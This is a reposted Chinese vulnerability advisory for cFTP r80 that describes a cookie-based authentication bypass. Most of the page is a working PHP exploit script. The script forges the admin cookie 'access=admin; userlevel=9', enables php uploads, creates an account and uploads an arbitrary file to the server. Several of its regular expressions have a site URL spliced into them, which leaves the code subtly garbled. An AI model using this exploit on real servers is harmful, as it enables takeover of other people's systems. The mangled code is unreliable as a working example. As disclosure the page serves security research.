cFTP不安全Cookie身份验证绕过漏洞

发布日期:2011-07-29
更新日期:2011-07-29

受影响系统:
cFTP clients-oriented-ftp r80
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 48931

cFTP是一种基于PHP的文件交换应用。

cFTP在验证Cookie的实现上存在身份验证绕过漏洞,远程攻击者可利用此漏洞获取受影响应用程序的管理员访问权限。

<*来源:Simon Leblanc
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux

// Vulnerable URL
$url = 'http://[url domain]/cFTP/';

// The file to upload
$filename = dirname(__FILE__).'/info.php';


$failext = array('php', 'pl');
$username = 'hackname'.rand(0, 999999);
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)

/**
* Call URL
*/
function curl_call_url($url, $cookies_injection, $inputs = null)
{
  $curl = curl_init();
 
  curl_setopt($curl, CURLOPT_URL, $url);
  curl_setopt($curl, CURLOPT_HEADER, false);
  curl_setopt($curl, CURLOPT_POST, true);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection);
 
  if (is_array($inputs) === true) {
    curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs);
  }
 
  $response = curl_exec($curl);
  $headers = curl_getinfo($curl);
  $error_number   = curl_errno($curl);
  $error_message  = curl_error($curl);
 
  curl_close($curl);
 
  return array($response, $headers, $error_number, $error_message);
}

// Add vulnerable extensions (php, pl : defined in $failext)
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);

if (preg_match_all('/<input([^>]+)name="https://www.linuxidc.com/Linux/2011-08/([^"]+)"([^>]+)value="https://www.linuxidc.com/Linux/2011-08/([^"]+)([^>]*)>/', $response, $matches)) {
  $input = array();
  $count = count($matches[0]);
  for ($i = 0; $i < $count; $i++) {
    $input[$matches[2][$i]] = $matches[4][$i];
    if ($matches[2][$i] === 'allowed_file_types') {
      foreach ($failext as $ext) {
        if (strpos($matches[4][$i], $ext) === false) {
          $input[$matches[2][$i]] .= ','.$ext;
        }
      }
      $input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
    }
  }
 
  // add select
  if (preg_match('/<option selected="selected" value="https://www.linuxidc.com/Linux/2011-08/([^"]+)"/', $response, $matches)) {
    $input['timezone'] = $matches[1];
  } else {
    $input['timezone'] = 'America/Argentina/Buenos_Aires';
  }
 
  // Validate the form to add the vulnerables extensions
  list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
 
  if (strpos($response, 'message_ok') !== false) {
    // Add new client : required to upload the file
    $input = array(
      'add_client_form_name' => $username,
      'add_client_form_user' => $username,
      'add_client_form_pass' => 'hackname',
      'add_client_form_pass2' => 'hackname',
      'add_client_form_address' => 'my address',
      'add_client_form_phone' => '000-000-000',
      //'add_client_form_notify' => '0',
      'add_client_form_email' => $username.'@example.com',
      'add_client_form_intcont' => '',
      'Submit' => 'Create account',
    );
   
    list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
   
    if (strpos($response, 'message_ok') !== false) {
      // Now upload file :-)
      $input = array(
        'name' => 'my_hack_file',
        'description' => 'It\'s my hack file',
        'clientname' => $username,
        'ufile' => '@'.$filename,
        'Submit' => 'Upload',
      );
     
      list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
     
      if (preg_match('#<a href="https://www.linuxidc.com/Linux/2011-08/([^"]+)">File uploaded correctly#', $response, $matches)) {
        // get filename
        list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
       
        if (preg_match('#<a href="https://www.linuxidc.com/Linux/2011-08/([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
          echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
        } else {
          var_dump($response);
          echo 'fail to hack : where is the file !!!';
        }
      } else {
        var_dump($response);
        echo 'fail to hack : file not uploaded';
      }
    } else {
      var_dump($response);
      echo 'fail to hack : client not created';
    }
   
  } else {
    var_dump($response);
    echo 'fail to hack : options not changed';
  }
 
} else {
  var_dump($response);
  echo 'fail to hack : no input';
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

cFTP
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwxgsg.html